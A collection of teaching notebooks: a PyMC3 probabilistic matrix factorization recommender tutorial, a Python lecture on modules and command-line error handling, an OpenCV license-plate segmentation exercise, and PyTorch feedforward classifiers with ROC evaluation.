for idx in sample:
idx_pair = idx_pairs[idx]
test[idx_pair] = train[idx_pair] # transfer to test set
train[idx_pair] = np.nan # remove from train set
# Verify everything worked properly
assert train_size == N - np.isnan(train).sum()
assert test_size == N - np.isnan(test).sum()
# Return train set and test set
return train, test
train, test = split_train_test(dense_data)
```
## Results
```
# Let's see the results:
baselines = {}
for name in baseline_methods:
Method = baseline_methods[name]
method = Method(train)
baselines[name] = method.rmse(test)
print("{} RMSE:\t{:.5f}".format(method, baselines[name]))
```
As expected: the uniform random baseline is the worst by far, the global mean baseline is next best, and the mean of means method is our best baseline. Now let's see how PMF stacks up.
```
# We use a fixed precision for the likelihood.
# This reflects uncertainty in the dot product.
# We choose 2, following the footsteps of
# Salakhutdinov and Mnih.
ALPHA = 2
# The dimensionality D; the number of latent factors.
# We can adjust this higher to try to capture more subtle
# characteristics of each movie. However, the higher it is,
# the more expensive our inference procedures will be.
# Specifically, we have D(N + M) latent variables. For our
# Movielens dataset, this means we have D(2625), so for 10
# dimensions, we are sampling 26250 latent variables.
DIM = 10
pmf = PMF(train, DIM, ALPHA, std=0.05)
```
### Predictions Using MAP
```
# Find MAP for PMF.
pmf.find_map();
```
Excellent. The first thing we want to do is make sure the MAP estimate we obtained is reasonable. We can do this by computing RMSE on the predicted ratings obtained from the MAP values of $U$ and $V$. First we define a function for generating the predicted ratings $R$ from $U$ and $V$. We ensure the actual rating bounds are enforced by setting all values below 1 to 1 and all values above 5 to 5. Finally, we compute RMSE for both the training set and the test set. We expect the test RMSE to be higher. The difference between the two gives some idea of how much we have overfit. Some difference is always expected, but a very low RMSE on the training set with a high RMSE on the test set is a definite sign of overfitting.
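The prediction step described here reduces to a dot product followed by clipping. A minimal sketch of that idea (not the notebook's actual `PMF.predict`, which is defined earlier; `U` is assumed $N \times D$ and `V` is $M \times D$):

```python
import numpy as np

def predict_clipped(U, V, low=1, high=5):
    """Sketch: predicted ratings R = U V^T, clipped to the rating bounds."""
    R = U @ V.T              # N x M matrix of predicted ratings
    return np.clip(R, low, high)

U = np.array([[1.0, 2.0]])   # one user, D = 2
V = np.array([[0.5, 0.5],    # two movies
              [4.0, 4.0]])
print(predict_clipped(U, V))  # [[1.5 5. ]] -- the raw 12.0 is clipped down to 5
```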
```
def eval_map(pmf_model, train, test):
U = pmf_model.map["U"]
V = pmf_model.map["V"]
# Make predictions and calculate RMSE on train & test sets.
predictions = pmf_model.predict(U, V)
train_rmse = rmse(train, predictions)
test_rmse = rmse(test, predictions)
overfit = test_rmse - train_rmse
# Print report.
print("PMF MAP training RMSE: %.5f" % train_rmse)
print("PMF MAP testing RMSE: %.5f" % test_rmse)
print("Train/test difference: %.5f" % overfit)
return test_rmse
# Add eval function to PMF class.
PMF.eval_map = eval_map
# Evaluate PMF MAP estimates.
pmf_map_rmse = pmf.eval_map(train, test)
pmf_improvement = baselines["mom"] - pmf_map_rmse
print("PMF MAP Improvement: %.5f" % pmf_improvement)
```
We actually see a decrease in performance between the MAP estimate and the mean of means performance. We also have a fairly large difference in the RMSE values between the train and the test sets. This indicates that the point estimates for $\alpha_U$ and $\alpha_V$ that we calculated from our data are not doing a great job of controlling model complexity.
Let's see if we can improve our estimates by approximating our posterior distribution with MCMC sampling. We'll draw 500 samples, with 500 tuning samples.
### Predictions Using MCMC
```
# Draw MCMC samples.
pmf.draw_samples(
draws=500,
tune=500,
)
```
### Diagnostics and Posterior Predictive Check
The next step is to check how many samples we should discard as burn-in. Normally, we'd do this using a traceplot to get some idea of where the sampled variables start to converge. In this case, we have high-dimensional samples, so we need a way to summarize them. One way was proposed by [Salakhutdinov and Mnih, p.886](https://www.cs.toronto.edu/~amnih/papers/bpmf.pdf). We can calculate the Frobenius norms of $U$ and $V$ at each step and monitor those for convergence. This essentially gives us some idea of when the average magnitude of the latent variables is stabilizing. The equations for the Frobenius norms of $U$ and $V$ are shown below. We will use `numpy`'s `linalg` package to calculate these.
$$ \|U\|_{Fro} = \sqrt{\sum_{i=1}^N \sum_{d=1}^D |U_{id}|^2}, \hspace{40pt} \|V\|_{Fro} = \sqrt{\sum_{j=1}^M \sum_{d=1}^D |V_{jd}|^2} $$
```
def _norms(pmf_model, monitor=("U", "V"), ord="fro"):
"""Return norms of latent variables at each step in the
sample trace. These can be used to monitor convergence
of the sampler.
"""
norms = {var: [] for var in monitor}
for sample in pmf_model.trace:
for var in monitor:
norms[var].append(np.linalg.norm(sample[var], ord))
return norms
def _traceplot(pmf_model):
"""Plot Frobenius norms of U and V as a function of sample #."""
trace_norms = pmf_model.norms()
u_series = pd.Series(trace_norms["U"])
v_series = pd.Series(trace_norms["V"])
fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(15, 7))
u_series.plot(kind="line", ax=ax1, grid=False, title=r"$\|U\|_{Fro}$ at Each Sample")
v_series.plot(kind="line", ax=ax2, grid=False, title=r"$\|V\|_{Fro}$ at Each Sample")
ax1.set_xlabel("Sample Number")
ax2.set_xlabel("Sample Number")
PMF.norms = _norms
PMF.traceplot = _traceplot
pmf.traceplot()
```
It appears we get convergence of $U$ and $V$ after about the default number of tuning samples. When testing for convergence, we also want to see convergence of the particular statistics we are looking for, since different characteristics of the posterior may converge at different rates. Let's also do a traceplot of the RMSE. We'll compute RMSE for both the train and the test set, even though convergence is indicated by RMSE on the training set alone. In addition, let's compute a running RMSE on the train/test sets to see how aggregate performance improves or decreases as we continue to sample.
Notice here that we are sampling from only one chain, which makes convergence statistics like $\hat{r}$ impossible to compute (we can still compute the split-rhat, but its purpose is different). The reason for not sampling multiple chains is that PMF might not have a unique solution. Without constraints, the solutions are at best symmetrical and at worst identical under any rotation, and in any case subject to label switching. In fact, if we sample from multiple chains we will see a large $\hat{r}$, indicating that the sampler is exploring different solutions in different parts of parameter space.
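The rotation symmetry is easy to verify numerically: for any orthogonal matrix $Q$, replacing $U$ with $UQ$ and $V$ with $VQ$ leaves the predicted ratings $UV^T$ unchanged, so the likelihood cannot distinguish the two solutions. An illustrative check (not part of the model code):

```python
import numpy as np

rng = np.random.default_rng(0)
U = rng.normal(size=(4, 2))   # 4 users, D = 2
V = rng.normal(size=(3, 2))   # 3 movies

# Build an orthogonal 2x2 rotation matrix.
theta = 0.7
Q = np.array([[np.cos(theta), -np.sin(theta)],
              [np.sin(theta),  np.cos(theta)]])

R1 = U @ V.T
R2 = (U @ Q) @ (V @ Q).T      # rotate both factor matrices by Q
print(np.allclose(R1, R2))    # True: Q Q^T = I cancels inside the product
```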
```
def _running_rmse(pmf_model, test_data, train_data, burn_in=0, plot=True):
"""Calculate RMSE for each step of the trace to monitor convergence."""
burn_in = burn_in if len(pmf_model.trace) >= burn_in else 0
results = {"per-step-train": [], "running-train": [], "per-step-test": [], "running-test": []}
R = np.zeros(test_data.shape)
for cnt, sample in enumerate(pmf_model.trace[burn_in:]):
sample_R = pmf_model.predict(sample["U"], sample["V"])
R += sample_R
running_R = R / (cnt + 1)
results["per-step-train"].append(rmse(train_data, sample_R))
results["running-train"].append(rmse(train_data, running_R))
results["per-step-test"].append(rmse(test_data, sample_R))
results["running-test"].append(rmse(test_data, running_R))
results = pd.DataFrame(results)
if plot:
results.plot(
kind="line",
grid=False,
figsize=(15, 7),
title="Per-step and Running RMSE From Posterior Predictive",
)
# Return the final predictions, and the RMSE calculations
return running_R, results
PMF.running_rmse = _running_rmse
predicted, results = pmf.running_rmse(test, train)
# And our final RMSE?
final_test_rmse = results["running-test"].values[-1]
final_train_rmse = results["running-train"].values[-1]
print("Posterior predictive train RMSE: %.5f" % final_train_rmse)
print("Posterior predictive test RMSE: %.5f" % final_test_rmse)
print("Train/test difference: %.5f" % (final_test_rmse - final_train_rmse))
print("Improvement from MAP: %.5f" % (pmf_map_rmse - final_test_rmse))
print("Improvement from Mean of Means: %.5f" % (baselines["mom"] - final_test_rmse))
```
We have some interesting results here. As expected, our MCMC sampler provides lower error on the training set. However, it seems it does so at the cost of overfitting the data. This results in a decrease in test RMSE as compared to the MAP, even though it is still much better than our best baseline. So why might this be the case? Recall that we used point estimates for our precision parameters $\alpha_U$ and $\alpha_V$ and we chose a fixed precision $\alpha$. It is quite likely that by doing this, we constrained our posterior in a way that biased it towards the training data. In reality, the variance in the user ratings and the movie ratings is unlikely to be equal to the means of sample variances we used. Also, the most reasonable observation precision $\alpha$ is likely different as well.
### Summary of Results
Let's summarize our results.
```
size = 100 # RMSE doesn't really change after 100th sample anyway.
all_results = pd.DataFrame(
{
"uniform random": np.repeat(baselines["ur"], size),
"global means": np.repeat(baselines["gm"], size),
"mean of means": np.repeat(baselines["mom"], size),
"PMF MAP": np.repeat(pmf_map_rmse, size),
"PMF MCMC": results["running-test"][:size],
}
)
fig, ax = plt.subplots(figsize=(10, 5))
all_results.plot(kind="line", grid=False, ax=ax, title="RMSE for all methods")
ax.set_xlabel("Number of Samples")
ax.set_ylabel("RMSE");
```
## Summary
We set out to predict user preferences for unseen movies. First we discussed the intuitive notion behind the user-user and item-item neighborhood approaches to collaborative filtering. Then we formalized our intuitions. With a firm understanding of our problem context, we moved on to exploring our subset of the Movielens data. After discovering some general patterns, we defined three baseline methods: uniform random, global mean, and mean of means. With the goal of besting our baseline methods, we implemented the basic version of Probabilistic Matrix Factorization (PMF) using `pymc3`.
Our results demonstrate that the mean of means method is our best baseline on our prediction task. As expected, we are able to obtain a significant decrease in RMSE using the PMF MAP estimate obtained via Powell optimization. We illustrated one way to monitor convergence of an MCMC sampler with a high-dimensionality sampling space using the Frobenius norms of the sampled variables. The traceplots using this method seem to indicate that our sampler converged to the posterior. Results using this posterior showed that attempting to improve the MAP estimation using MCMC sampling actually overfit the training data and increased test RMSE. This was likely caused by the constraining of the posterior via fixed precision parameters $\alpha$, $\alpha_U$, and $\alpha_V$.
As a followup to this analysis, it would be interesting to also implement the logistic and constrained versions of PMF. We expect both models to outperform the basic PMF model. We could also implement the [fully Bayesian version of PMF](https://www.cs.toronto.edu/~amnih/papers/bpmf.pdf) (BPMF), which places hyperpriors on the model parameters to automatically learn ideal mean and precision parameters for $U$ and $V$. This would likely resolve the issue we faced in this analysis. We would expect BPMF to improve upon the MAP estimation produced here by learning more suitable hyperparameters and parameters. For a basic (but working!) implementation of BPMF in `pymc3`, see [this gist](https://gist.github.com/macks22/00a17b1d374dfc267a9a).
If you made it this far, then congratulations! You now have some idea of how to build a basic recommender system. These same ideas and methods can be used on many different recommendation tasks. Items can be movies, products, advertisements, courses, or even other people. Any time you can build yourself a user-item matrix with user preferences in the cells, you can use these types of collaborative filtering algorithms to predict the missing values. If you want to learn more about recommender systems, the first reference is a good place to start.
## References
1. Y. Koren, R. Bell, and C. Volinsky, “Matrix Factorization Techniques for Recommender Systems,” Computer, vol. 42, no. 8, pp. 30–37, Aug. 2009.
2. K. Goldberg, T. Roeder, D. Gupta, and C. Perkins, “Eigentaste: A constant time collaborative filtering algorithm,” Information Retrieval, vol. 4, no. 2, pp. 133–151, 2001.
3. A. Mnih and R. Salakhutdinov, “Probabilistic matrix factorization,” in Advances in neural information processing systems, 2007, pp. 1257–1264.
4. S. J. Nowlan and G. E. Hinton, “Simplifying Neural Networks by Soft Weight-sharing,” Neural Comput., vol. 4, no. 4, pp. 473–493, Jul. 1992.
5. R. Salakhutdinov and A. Mnih, “Bayesian Probabilistic Matrix Factorization Using Markov Chain Monte Carlo,” in Proceedings of the 25th International Conference on Machine Learning, New York, NY, USA, 2008, pp. 880–887.
The model discussed in this analysis was developed by Ruslan Salakhutdinov and Andriy Mnih. Code and supporting text are the original work of [Mack Sweeney](https://www.linkedin.com/in/macksweeney) with changes made to adapt the code and text for the Movielens dataset by Colin Carroll and Rob Zinkov.
```
%load_ext watermark
%watermark -n -u -v -iv -w
```
---
# Making your own modules
If a function will be used in multiple programs, it should be written
as a module instead.
All one has to do is put the functions in a program_name.py
file and import either the whole module or just the functions you need, then
use them in the main program.
This works exactly the same way as importing and using any other library.
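To make the mechanics concrete, here is a self-contained sketch that writes a tiny module to a temporary directory and then imports a function from it (the module name `kinematics_demo` is made up for this illustration; in practice you would simply create the `.py` file next to your main program):

```python
import os
import sys
import tempfile

# Write a tiny module to a temp directory so this sketch is self-contained.
module_source = (
    "def eKinetic(mass, velocity):\n"
    "    return 0.5 * mass * velocity**2\n"
)
tmpdir = tempfile.mkdtemp()
with open(os.path.join(tmpdir, "kinematics_demo.py"), "w") as f:
    f.write(module_source)

sys.path.insert(0, tmpdir)            # make the module importable
from kinematics_demo import eKinetic  # import just the function we need

print(eKinetic(2, 3))  # 0.5 * 2 * 3**2 = 9.0
```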
## Example
Given mass and velocity, this function calculates the kinetic energy of a particle
in meters/kilograms/seconds (mks) units.
$$E_k = \frac{1}{2} \cdot mv^2$$
```
def eKinetic(mass, velocity):
return 0.5 * mass * velocity**2
eKinetic(1, 10)
```
#### Q. What will the output be?
The following function calculates the x, y, and z accelerations
of a particle resulting from forces acting upon it given its mass.
All units are SI.
$a=\frac{F}{m}$ rearranged from $F=ma$
> Note: These techniques are also related to some of the tasks in the homework and the final project.
```
def acceleration(xForce, yForce, zForce, mass):
xAccel = float(xForce) / float(mass)
yAccel = float(yForce) / float(mass)
zAccel = float(zForce) / float(mass)
return (xAccel, yAccel, zAccel)
```
#### Q. What will this do?
```
acceleration(10, 20, 30, 5)
```
```
# remember that this line overwrites the local definition
# because it has the same name as above!
from kinematics import eKinetic, acceleration
mass = 100
velocity = 10
xForce = 10
yForce = 20
zForce = 30
kEnergy = eKinetic(mass, velocity)
mAccel = acceleration(xForce, yForce, zForce, mass)
kEnergy, mAccel
```
### Providing program arguments on the command-line
Input is often supplied to Python scripts via the command line.
Put another way, "arguments" are provided to scripts.
Here are some Linux examples:
```bash
echo $PATH
```
echo is the command, `$PATH` is an argument. Or,
```bash
cd some_directory
```
cd is the command, `some_directory` is an argument.
```bash
cd
```
No arguments here -- default behavior: cd $HOME
We can do the same sort of thing in Python using the sys module.
The following script (lecture_08_wavetofreq.py) converts a
user-supplied wavelength (in Angstroms) to frequency (in Hz).
I show you here how to quickly load an existing script into the notebook, using %load:
```
# %load lecture_08_wavetofreq.py
#!/usr/bin/env python
import sys  # "sys" is short for "system"
wave = float(sys.argv[1])
freq = 3.0e8 / (wave / 1e10)  # convert wavelength in Angstroms to frequency in Hz
print('frequency (Hz) = %e' % freq)
sys.argv
```
sys.argv contains a list of the command line arguments to the program.
sys.argv[0] is always the name of the program.
To run it in a Linux terminal (must be in same directory as file):
```bash
python lecture_08_wavetofreq.py 5000
```
To run it within here or a simple ipython terminal (file must be in same directory that you
launched the notebook from):
```
%run lecture_08_wavetofreq.py 5000
```
#### Q. What if there is more than one command-line input required?
```
import sys
for i, element in enumerate(sys.argv):
print("Argument #{} = {}".format(i, element))
```
#### Q. What will the following command do in a Linux session?
You will practice with sys in the tutorial!
```
%run lecture_08_systest.py 'hello' 2 4 6
```
### Error Handling
The script lecture_08_wavetofreq.py expects an argument, the
wavelength in Angstroms:
```
# lecture_08_wavetofreq.py
import sys
wave = float(sys.argv[1]) # Attempting to use the argument here.
freq = 3.0e8 / (wave / 1e10) # Convert wavelength in Angstroms to frequency in Hz
print('frequency (Hz) = %e' % freq)
```
If we forget to supply that argument, we get an error message:
```
%run lecture_08_wavetofreq.py
```
It tells us the file and line where the error occurred, and
the type of error (IndexError).
#### Q. What is a simple way we could tell if the user forgot the argument and exit the program gracefully without a crash?
```
# lecture_08_wavetofreq2.py
import sys
if len(sys.argv) < 2:
print('Enter the wavelength in Angstroms on the command line.')
sys.exit(1) # Exits and 1 indicates failure
# sys.exit() or sys.exit(0) is used to indicate success
wave = float(sys.argv[1])
freq = 3.0e8 / (wave / 1e10)
print('frequency (Hz) = %e' % freq )
```
#### Q. What will the following yield?
```
%run lecture_08_wavetofreq2.py 5000
```
#### Q. And this?
```
%run lecture_08_wavetofreq2.py
%tb
```
### Exception Handling
Alternatively, the program can try to run the code and
if errors are found, jump to statements that handle
the error as desired.
This is done with two new reserved words, "try" and "except",
which are used in a similar way as "if" and "elif".
This is the script lecture_08_wavetofreq3.py:
```
# lecture_08_wavetofreq3.py
import sys
try:
wave = float(sys.argv[1])
except:
print('Enter the wavelength in Angstroms on the command line.')
sys.exit(1)
freq = 3.0e8 / (wave / 1e10)
print('frequency (Hz) = %e' % freq)
```
If the command in the try block produces an error, the except block
is executed.
#### Q. What does "wave = float(sys.argv[1])" attempt to do?
#### Q. What if we try to do the following:
```
%run lecture_08_wavetofreq3.py x
%tb
```
> The program could also fail if something other than a number is given
on the command line!
That produces a ValueError, not an IndexError.
We can fix this with two separate exceptions appropriate for the two
possible errors (this is similar to if/elif/elif):
```
# lecture_08_wavetofreq4.py
import sys
try:
wave = float(sys.argv[1])
except IndexError:
print('Enter the wavelength in Angstroms on the command line.')
sys.exit(1)
except ValueError as error:
print("The error is:", error)
sys.exit(2)
freq = 3.0e8 / (wave / 1e10)
print('frequency (Hz) = %e' % freq)
```
#### Q. What do these yield?
```
%run lecture_08_wavetofreq4.py 5000
%run lecture_08_wavetofreq4.py
%run lecture_08_wavetofreq4.py x
```
### Common error types
```
data = range(9)
data[9]
```
```
y = float('x')
y = float('3')
y
```
```
x
```
```
4.0/0
```
```
iff 2 > 1:
print('it is.')
```
```
10.0 * 'blah'
```
#### Q. But what will this do?
```
5 * 'blah '
```
Nice flowchart on error handling (http://i.imgur.com/WRuJV6r.png):

---
<a href="https://colab.research.google.com/github/josearangos/PDI/blob/Colab/Colab_Class/binarySegmentation.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
```
import cv2
import numpy as np
import matplotlib.pyplot as plt
from google.colab.patches import cv2_imshow
```
## Binary Segmentation
### Activity
In this class we analyze a binarized image of a car (input) in which the license plate stands out, and the goal is to extract only the plate.
```
! wget https://github.com/josearangos/PDI/raw/Colab/Resources/Image/placa_bina.png
! wget https://github.com/josearangos/PDI/raw/Colab/Resources/Image/carro_shape.jpg
```
## Reading the image
```
a = cv2.imread('placa_bina.png',0)  # Read the image as a 2-D (grayscale) array
b = a.copy()  # Make a copy
fil,col = b.shape  # Store its dimensions in separate variables
cv2_imshow(b)
```
## Applying the mask
```
a = cv2.threshold(a,127,255,cv2.THRESH_BINARY)[1]  # Threshold to a single-channel binary image so we can apply connected-components labeling
ret, labels = cv2.connectedComponents(a,4)  # Store the number of labels and a matrix giving each pixel's label
# Map components to hue values (HSV): build a pseudo-color image of the original in which pixels that share a label share a color
label_hue = np.uint8(179*labels/np.max(labels))
blank_ch = 255*np.ones_like(label_hue)
labeled_a = cv2.merge([label_hue, blank_ch, blank_ch])
# Convert to BGR for display
labeled_a = cv2.cvtColor(labeled_a, cv2.COLOR_HSV2BGR)
# Convert the background to white
labeled_a[label_hue==0] = 255  # Set to 255 the pixels whose label in the label matrix is zero
cv2_imshow(labeled_a)
```
## Plotting the pixel distribution
```
total = []  # List that will hold (label, pixel count) pairs
valor = 0  # Variable that will hold the current label
for i in range (1,ret):  # For each label, count its pixels and store the result
    valor = i
    c = b*0
    c[labels == i] = 1
    suma = np.sum(c)
    total = [(valor,suma)] + total
x_list = [l[0] for l in total]  # Extract the label values from the list
y_list = [l[1] for l in total]  # Extract the pixel count for each label
y_list = np.uint32(y_list)  # Convert the pixel counts to 32-bit integers
plt.scatter(x_list,y_list)  # Plot x = labels, y = pixel count per label
plt.show()  # Show the plot
d = cv2.imread('carro_shape.jpg',1)  # Read the original color image of the car
mx = np.max(total)  # Find the label with the largest number of connected pixels
ind = []
ind = np.where(mx==total)  # Store where that maximum occurs
c = b*0  # Create an empty matrix the size of b
c[labels == 262] = 255  # Set to 255 (white) every pixel carrying the plate's label (hard-coded here as 262)
cv2_imshow(c)  # Show the resulting mask
x,y = np.where(c>0)  # Store the coordinates of every white (255) pixel in c
fm = np.min(x)  # Minimum row
fx = np.max(x)  # Maximum row
cm = np.min(y)  # Minimum column
cx = np.max(y)  # Maximum column
d = d[fm:fx,cm:cx,:]  # Crop the original image to the bounding box given by the four values above
```
## Plate result
```
cv2_imshow(d)  # Show the resulting image
```
---
```
import torch
import numpy as np
import pandas as pd
from sklearn.model_selection import train_test_split
from sklearn import svm
from xgboost import XGBClassifier
from sklearn.metrics import recall_score
from joblib import dump, load
from sklearn.metrics import roc_curve, auc
import matplotlib.pyplot as plt
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
print(torch.cuda.is_available())
new_file = 'newnew.xlsx'
new_dataframe = pd.read_excel(new_file, sheet_name=0)
new_dataframe1 = pd.read_excel(new_file, sheet_name=2).iloc[:, range(16)]
new_dataframe2 = pd.read_excel(new_file, sheet_name=2).iloc[:, range(17,31)]
# Dataset1
new_dataframe.info()
# Dataset2
new_dataframe1.info()
# Dataset3
new_dataframe2.info()
```
## Dataset for outside validation
```
## outside validation
test_frame1 = pd.read_excel(new_file, sheet_name=1)
test_frame2 = pd.read_excel(new_file, sheet_name=3).iloc[:, range(16)]
test_frame3 = pd.read_excel(new_file, sheet_name=3).iloc[:, range(17,31)]
# Dataset1
X_first = new_dataframe.iloc[:,range(0,11)]
y_first = new_dataframe.iloc[:, -1]  # the second indicator (target variable)
X_first = np.asarray(X_first)
# Dataset2
X_second = new_dataframe1.iloc[:,range(0,15)]
y_second = new_dataframe1.iloc[:, -1]  # the second indicator (target variable)
X_second = np.asarray(X_second)
# Dataset3
X_third = new_dataframe2.iloc[:,range(0,13)]
y_third = new_dataframe2.iloc[:, -1]  # the second indicator (target variable)
X_third = np.asarray(X_third)
y_first = np.array(y_first)
y_second = np.array(y_second)
y_third = np.array(y_third)
X_train_first, X_test_first, y_train_first, y_test_first= train_test_split(X_first, y_first, test_size=0.2, random_state=100)
X_test_first = torch.Tensor(X_test_first)
X_train_first = torch.Tensor(X_train_first)
y_train_first = torch.Tensor(y_train_first)
y_test_first = torch.Tensor(y_test_first)
X_train_second, X_test_second, y_train_second, y_test_second = train_test_split(X_second, y_second, test_size=0.2, random_state=100)
X_train_second = torch.Tensor(X_train_second)
X_test_second = torch.Tensor(X_test_second)
y_train_second = torch.Tensor(y_train_second)
y_test_second = torch.Tensor(y_test_second)
X_train_third, X_test_third, y_train_third, y_test_third = train_test_split(X_third, y_third, test_size=0.2, random_state=100)
X_train_third, X_test_third, y_train_third, y_test_third = torch.Tensor(X_train_third), torch.Tensor(X_test_third),torch.Tensor(y_train_third),torch.Tensor(y_test_third)
```
## ANN Training
### Model for Dataset1
```
class Feedforward_first(torch.nn.Module):
def __init__(self, input_size, hidden_size):
super(Feedforward_first, self).__init__()
self.input_size = input_size
self.hidden_size = hidden_size
self.batchnorm = torch.nn.BatchNorm1d(self.hidden_size)
self.laynorm = torch.nn.LayerNorm(self.input_size)
self.fc1 = torch.nn.Linear(self.input_size, self.hidden_size, bias=True)
self.relu = torch.nn.ReLU()
self.fc2 = torch.nn.Linear(self.hidden_size, 5, bias=True)
self.relu2 = torch.nn.ReLU()
self.fc3 = torch.nn.Linear(5, 1, bias=True)
self.sigmoid = torch.nn.Sigmoid()
def forward(self, x):
hidden = self.fc1(x)
batchnorm = self.batchnorm(hidden)
relu = self.relu(batchnorm)
output = self.fc2(relu)
output = self.relu2(output)
output = self.fc3(output)
output = self.sigmoid(output)
return output
X_train_first.shape[1]
model1 = Feedforward_first(X_train_first.shape[1],10)
criterion1 = torch.nn.BCELoss()
optimizer1 = torch.optim.SGD(model1.parameters(), lr = 0.01, momentum=0.9, weight_decay= 0.001)
model1.train()
epoch = 200
loss_array = []
for epoch in range(epoch):
optimizer1.zero_grad()
# Forward pass
y_pred = model1(X_train_first)
# Compute Loss
loss = criterion1(y_pred.squeeze(), y_train_first)
loss_array.append(float(loss.item()))
print('Epoch {}: train loss: {}'.format(epoch, loss.item()))
# Backward pass
loss.backward()
optimizer1.step()
plt.plot(loss_array)
plt.title("Training Loss of ANN on Dataset1")
plt.xlabel("Epochs")
plt.ylabel("Loss Value")
model1.eval()
y_pred_first = model1(X_test_first)
y_pred_first_int = []
for item in y_pred_first:
y_pred_first_int.append(round(float(item[0])))
print(y_pred_first_int)
print(y_test_first)
print(np.sum(y_pred_first_int==np.array(y_test_first))/len(y_pred_first_int))
### accuracy on training set
y_pred = model1(X_train_first)
y_pred_int = []
for item in y_pred:
y_pred_int.append(round(float(item[0])))
print(y_pred_int)
print(y_train_first)
print(np.sum(y_pred_int==np.array(y_train_first))/len(y_pred_int))
### ROC and AUC for ANN1
y_label = y_test_first.int().tolist()  # non-binary labels require pos_label
y_pre = y_pred_first_int
print(y_label)
print(y_pre)
fpr1, tpr1, thersholds1 = roc_curve(y_label, y_pre, pos_label=1)
fpr2, tpr2, thersholds2 = roc_curve(y_test_second, y_pred_second_int, pos_label=1)
fpr3, tpr3, thersholds3 = roc_curve(y_test_third, y_pred_third_int, pos_label=1)
# for i, value in enumerate(thersholds):
# print("%f %f %f" % (fpr[i], tpr[i], value))
roc_auc1 = auc(fpr1, tpr1)
roc_auc2 = auc(fpr2, tpr2)
roc_auc3 = auc(fpr3, tpr3)
plt.plot(fpr1, tpr1, 'k--', label='ROC (area = {0:.2f}) without Gene Sequence'.format(roc_auc1), lw=2, color='b')
plt.plot(fpr2, tpr2, 'k--', label='ROC (area = {0:.2f}) with TB53,rb1 and pik3ca'.format(roc_auc2), lw=2, color='r')
plt.plot(fpr3, tpr3, 'k--', label='ROC (area = {0:.2f}) with Number of Mutated Genes'.format(roc_auc3), lw=2, color='g')
plt.xlim([-0.05, 1.05])  # pad the x and y limits so the curves don't sit on the plot edges
plt.ylim([-0.05, 1.05])
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate')
plt.title('ROC Curves of ANN')
plt.legend(loc="lower right")
```
### Model for Dataset2
```
class Feedforward_second(torch.nn.Module):
    def __init__(self, input_size, hidden_size):
        super(Feedforward_second, self).__init__()
        self.input_size = input_size
        self.hidden_size = hidden_size
        # Both normalizations act on the hidden layer, so they must be sized
        # to hidden_size (the original sized them to input_size, which fails
        # whenever input_size != hidden_size):
        self.batchnorm = torch.nn.BatchNorm1d(self.hidden_size)
        self.laynorm = torch.nn.LayerNorm(self.hidden_size)
        self.fc1 = torch.nn.Linear(self.input_size, self.hidden_size, bias=True)
        self.relu = torch.nn.ReLU()
        self.fc2 = torch.nn.Linear(self.hidden_size, 5, bias=True)
        self.fc3 = torch.nn.Linear(5, 1, bias=True)
        self.sigmoid = torch.nn.Sigmoid()

    def forward(self, x):
        hidden = self.fc1(x)
        batchnorm = self.batchnorm(hidden)
        laynorm = self.laynorm(batchnorm)
        relu = self.relu(laynorm)
        output = self.fc2(relu)
        output = self.fc3(output)
        output = self.sigmoid(output)
        return output
X_train_second  # inspect the training tensor
model2 = Feedforward_second(X_train_second.shape[1],15)
criterion2 = torch.nn.BCELoss()
optimizer2 = torch.optim.Adam(model2.parameters(), lr = 0.01, weight_decay= 0.001)
model2.train()
num_epochs = 200
loss_array = []
for epoch in range(num_epochs):
    optimizer2.zero_grad()
    # Forward pass
    y_pred = model2(X_train_second)
    # Compute loss
    loss = criterion2(y_pred.squeeze(), y_train_second)
    loss_array.append(float(loss.item()))
    print('Epoch {}: train loss: {}'.format(epoch, loss.item()))
    # Backward pass
    loss.backward()
    optimizer2.step()
torch.save(model2, "ann_model.pt")
plt.plot(loss_array)
plt.title("Training Loss of ANN on Dataset2")
plt.xlabel("Epochs")
plt.ylabel("Loss Value")
model2.eval()
y_pred_second = model2(X_test_second)
y_pred_second_int = []
for item in y_pred_second:
    y_pred_second_int.append(round(float(item[0])))
print(y_pred_second_int)
print(y_test_second)
print(np.sum(y_pred_second_int==np.array(y_test_second))/len(y_test_second))
### accuracy on training set
y_pred = model2(X_train_second)
y_pred_int = []
for item in y_pred:
    y_pred_int.append(round(float(item[0])))
print(y_pred_int)
print(y_train_second)
print(np.sum(y_pred_int==np.array(y_train_second))/len(y_pred_int))
```
### Model for Dataset3
```
class Feedforward_third(torch.nn.Module):
    def __init__(self, input_size, hidden_size):
        super(Feedforward_third, self).__init__()
        self.input_size = input_size
        self.hidden_size = hidden_size
        self.batchnorm = torch.nn.BatchNorm1d(self.hidden_size)
        # LayerNorm acts on the hidden layer, so it is sized to hidden_size
        # (the original sized it to input_size, which fails whenever
        # input_size != hidden_size):
        self.laynorm = torch.nn.LayerNorm(self.hidden_size)
        self.fc1 = torch.nn.Linear(self.input_size, self.hidden_size, bias=True)
        self.relu = torch.nn.ReLU()
        self.fc2 = torch.nn.Linear(self.hidden_size, 5, bias=True)
        self.relu2 = torch.nn.ReLU()
        self.fc3 = torch.nn.Linear(5, 1, bias=True)
        self.sigmoid = torch.nn.Sigmoid()

    def forward(self, x):
        hidden = self.fc1(x)
        batchnorm = self.batchnorm(hidden)
        laynorm = self.laynorm(batchnorm)
        relu = self.relu(laynorm)
        output = self.fc2(relu)
        # Apply the second ReLU (the original re-created the module here
        # instead of calling it, so it was never applied):
        output = self.relu2(output)
        output = self.fc3(output)
        output = self.sigmoid(output)
        return output
model3 = Feedforward_third(X_train_third.shape[1],13)
criterion3 = torch.nn.BCELoss()
optimizer3 = torch.optim.Adam(model3.parameters(), lr = 0.01, weight_decay= 0.001)
model3.train()
num_epochs = 150
loss_array = []
for epoch in range(num_epochs):
    optimizer3.zero_grad()
    # Forward pass
    y_pred = model3(X_train_third)
    # Compute loss
    loss = criterion3(y_pred.squeeze(), y_train_third)
    loss_array.append(float(loss.item()))
    print('Epoch {}: train loss: {}'.format(epoch, loss.item()))
    # Backward pass
    loss.backward()
    optimizer3.step()
plt.plot(loss_array)
plt.title("Training Loss of ANN on Dataset3")
plt.xlabel("Epochs")
plt.ylabel("Loss Value")
model3.eval()
y_pred = model3(X_test_third)
y_pred_third_int = []
for item in y_pred:
    y_pred_third_int.append(round(float(item[0])))
print(len(y_pred_third_int))
